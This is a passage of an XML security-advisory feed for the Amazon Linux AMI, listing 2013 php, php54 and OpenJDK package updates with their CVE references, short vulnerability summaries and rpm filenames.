href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2453" title="" id="CVE-2013-2453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2454" title="" id="CVE-2013-2454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455" title="" id="CVE-2013-2455" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456" title="" id="CVE-2013-2456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457" title="" id="CVE-2013-2457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2458" title="" id="CVE-2013-2458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459" title="" id="CVE-2013-2459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2460" title="" id="CVE-2013-2460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2461" title="" id="CVE-2013-2461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463" title="" id="CVE-2013-2463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465" title="" id="CVE-2013-2465" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469" title="" id="CVE-2013-2469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470" title="" id="CVE-2013-2470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471" title="" id="CVE-2013-2471" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472" title="" id="CVE-2013-2472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473" title="" id="CVE-2013-2473" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0957.html" title="" id="RHSA-2013:0957" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" 
version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.29.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-205</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-205: critical priority package update for php</title><issued date="2013-06-24 13:48:00" /><updated date="2014-09-15 23:14:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2110:
964969:
CVE-2013-2110 php: Heap-based buffer overflow in quoted_printable_encode()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2110" title="" id="CVE-2013-2110" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-xml" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.26" release="1.0.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-devel-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.26" release="1.0.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-mcrypt-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.26" release="1.0.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-dba-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-enchant" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-enchant-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.26" release="1.0.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-mssql-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.26" release="1.0.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-odbc-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.26-1.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-206</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-206: critical priority package update for php54</title><issued date="2013-06-24 13:48:00" /><updated date="2014-09-15 23:14:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2110:
964969:
CVE-2013-2110 php: Heap-based buffer overflow in quoted_printable_encode()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2110" title="" id="CVE-2013-2110" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-process" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.16" 
release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package 
name="php54-intl" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.16" release="1.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-mbstring-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.16" release="1.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-mssql-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.16" release="1.37.amzn1" epoch="0" 
arch="i686"><filename>Packages/php54-xmlrpc-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.16-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-207</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-207: important priority package update for java-1.6.0-openjdk</title><issued date="2013-07-12 15:31:00" /><updated date="2014-09-15 23:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2473:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2472:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2471:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2470:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2469:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2465:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2463:
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption.
CVE-2013-2461:
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service.
CVE-2013-2459:
Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application.
CVE-2013-2457:
Multiple improper permission check issues were discovered in the Sound and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2456:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2455:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2453:
Multiple improper permission check issues were discovered in the Sound and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2452:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2450:
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service.
CVE-2013-2448:
Multiple improper permission check issues were discovered in the Sound and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2447:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2446:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2445:
It was discovered that the Hotspot component did not properly handle out-of-memory errors. An untrusted Java application or applet could possibly use these flaws to terminate the Java Virtual Machine.
CVE-2013-2444:
